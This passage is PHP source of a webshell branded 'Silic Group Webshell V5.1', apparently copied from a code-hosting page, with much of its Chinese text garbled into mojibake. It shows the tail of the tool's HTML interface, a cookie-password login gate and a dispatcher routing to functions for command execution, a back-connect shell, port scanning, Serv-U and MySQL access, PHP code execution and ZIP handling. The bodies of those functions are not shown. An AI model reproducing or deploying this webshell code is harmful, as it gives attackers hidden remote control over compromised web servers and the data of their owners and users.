<li><a href="?s=jk" id="t_12" onclick="switchTab('t_12')" target="main">Win<EFBFBD><EFBFBD><EFBFBD><EFBFBD></a></li>
<li><a href="?s=dd" id="t_13" onclick="switchTab('t_13')" target="main"><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD></a></li>
<li><a href="?s=ff" id="t_14" onclick="switchTab('t_14')" target="main">ִ<EFBFBD><EFBFBD>php<EFBFBD><EFBFBD><EFBFBD><EFBFBD></a></li>
<li><a href="?s=za" id="t_15" onclick="switchTab('t_15')" target="main">ZIP<EFBFBD><EFBFBD>ѹ</a></li></ul></td><td>
<iframe name="main" src="?s=a" width="100%" height="100%" frameborder="0"></iframe></td></tr></table></div>
<div class="footer">-= <a href="http://blackbap.org/" target="_blank">Silic Group</a> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʹ - Webshell V5.1 =-</div></div></body></html>
END;
return false;
}
}
/*<2A><>½<EFBFBD><C2BD><EFBFBD>ؽ<EFBFBD><D8BD><EFBFBD>*/
if(get_magic_quotes_gpc())
{
$_GET = Root_GP($_GET);
$_POST = Root_GP($_POST);
}
if($_COOKIE['admin_silicpass'] != md5($password))
{
ob_start();
$MSG_TOP = 'LOGIN';
if(isset($passt))
{
$cookietime = time() + 24 * 3600;
setcookie('admin_silicpass',md5($passt),$cookietime);
if(md5($passt) == md5($password)){die('<meta http-equiv="refresh" content="1;URL=?">');}
else{$MSG_TOP = 'PASS IS FALSE';}
}
Root_Login($MSG_TOP);
ob_end_flush();
exit;
}
if(isset($_GET['s'])){$s = $_GET['s'];if($s != 'a' && $s != 'n')Root_CSS();}else{$s = 'MyNameIsHacker';}
$p = isset($_GET['p']) ? $_GET['p'] : File_Str(dirname(__FILE__));
switch($s){
case"a":File_a($p);break;
case"d":Tihuan_d();break;
case"e":Antivirus_e();break;
case"f":Info_f();break;
case"g":Exec_g();break;
case"i":Port_i();break;
case"j":Findfile_j();break;
case"jk":winshell();break;
case"l":Servu_l();break;
case"n":Mysql_n();break;
case"o":Mysql_o();break;
case"p":File_Edit($_GET['fp'],$_GET['fn']); break;
case"pq":Pgr_sql(); break;
case"q":File_Soup($p); break;
case"r":Mysql_Msg(); break;
case"dd":backconn();break;
case"ff":phpcode();break;
case"gg":otherdb();break;
case"za":zipact();break;
default:WinMain();break;
}?>
Reference in a new issue Copy permalink